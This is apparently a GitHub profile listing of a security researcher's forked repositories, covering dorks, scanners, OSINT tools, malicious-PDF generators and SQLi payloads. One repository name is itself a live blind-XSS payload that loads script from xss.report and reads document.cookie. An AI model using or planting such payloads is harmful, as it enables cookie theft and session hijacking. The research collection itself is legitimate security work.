SaFiSec

2018-new-coder-survey

The results of the 2018 New Coder Survey

40k-nuclei-templates

40,000+ Nuclei templates for security scanning and detection across diverse web applications and services

50M_CTF_Writeup

$50 Million CTF from Hackerone - Writeup

All-in-one_BugBounty_PDF_bundles

Aloha-Editor

Aloha Editor is a JavaScript content editing library

API-s-for-OSINT

List of API's for gathering information about phone numbers, addresses, domains etc

Arjun

HTTP parameter discovery suite.

Bug-Bounty-Dork

Bug Bounty Dorks For World Wide Websites

LeakLooker

Find open databases with Shodan

SaFiSec/40k-nuclei-templates

40,000+ Nuclei templates for security scanning and detection across diverse web applications and services

SaFiSec/API-s-for-OSINT

List of API's for gathering information about phone numbers, addresses, domains etc

SaFiSec/Awesome-Cybersecurity-Handbooks

A huge chunk of my personal notes since I started playing CTFs and working as a Red Teamer.

SaFiSec/awesome-shodan-queries

🔍 A collection of interesting, funny, and depressing search queries to plug into shodan.io 👩‍💻

SaFiSec/Bug-Bounty-Dork

Bug Bounty Dorks For World Wide Websites

SaFiSec/bug-bounty-platforms

A community-powered collection of all known bug bounty platforms, vulnerability disclosure platforms, and crowdsourced security platforms currently active on the Internet.

SaFiSec/Leaked-Credentials

how to look for Leaked Credentials !

SaFiSec/malicious-pdf

💀 Generate a bunch of malicious pdf files with phone-home functionality. Can be used with Burp Collaborator or Interact.sh

SaFiSec/scan4all

Official repository vuls Scan: 15000+PoCs; 23 kinds of application password crack; 7000+Web fingerprints; 146 protocols and 90000+ rules Port scanning; Fuzz, HW, awesome BugBounty( ͡° ͜ʖ ͡°)...

SaFiSec/-script-src-https-xss.report-c-lover-script-

'/;//"><script src=https://xss.report/c/lover></script> <img src="data:image/png;base64,iVBORw0KGgo=" onerror="prompt(document.domain)"> <img src="data:image/png;base64,iVBORw0KGgo=" onerror="prompt(document.cookie)">

SaFiSec/800-Bug-Bounty-Programs

Asset inventory of over 800 public bug bounty programs.

SaFiSec/Affinity

Free 2D symbols for computer network diagrams

SaFiSec/awesome-android-security

A curated list of Android Security materials and resources For Pentesters and Bug Hunters

SaFiSec/Awesome-Dorks

Dorks for Bug Bounty Hunting

SaFiSec/bug-bounty-dorkss

List of Google Dorks for sites that have responsible disclosure program & bug bounty program

SaFiSec/Conferences

Conference slides

SaFiSec/fuzzuli

fuzzuli is a url fuzzing tool that aims to find critical backup files by creating a dynamic wordlist based on the domain.

SaFiSec/gitGraber

gitGraber: monitor GitHub to search and find sensitive data in real time for different online services such as: Google, Amazon, Paypal, Github, Mailgun, Facebook, Twitter, Heroku, Stripe...

SaFiSec/google-dorks-bug-bounty

A list of Google Dorks for Bug Bounty, Web Application Security, and Pentesting

SaFiSec/HackerGPT

SaFiSec/IMG-PAYLOADS

SaFiSec/Mindmap

This repository will contain many mindmaps for cyber security technologies, methodologies, courses, and certifications in a tree structure to give brief details about them

SaFiSec/OFFAT

The OWASP OFFAT tool autonomously assesses your API for prevalent vulnerabilities, though full compatibility with OAS v3 is pending. The project remains a work in progress, continuously evolving towards completion.

SaFiSec/One-Liners

A collection of awesome one-liners for bug bounty hunting.

SaFiSec/PDF-Exploits

this repo contains all types of pdf exploits..

SaFiSec/scrapts

Scrapts Scrapts Scrapts

SaFiSec/Shodan_Dorks

Shodan Dorks

SaFiSec/SQLI-PAYLOAD

Header Based SQLi's Payloads

SaFiSec/vapi

vAPI is Vulnerable Adversely Programmed Interface which is Self-Hostable API that mimics OWASP API Top 10 scenarios through Exercises.

SaFiSec/XXElixir

This tool is designed to test for file upload and XXE vulnerabilities by poisoning XLSX files.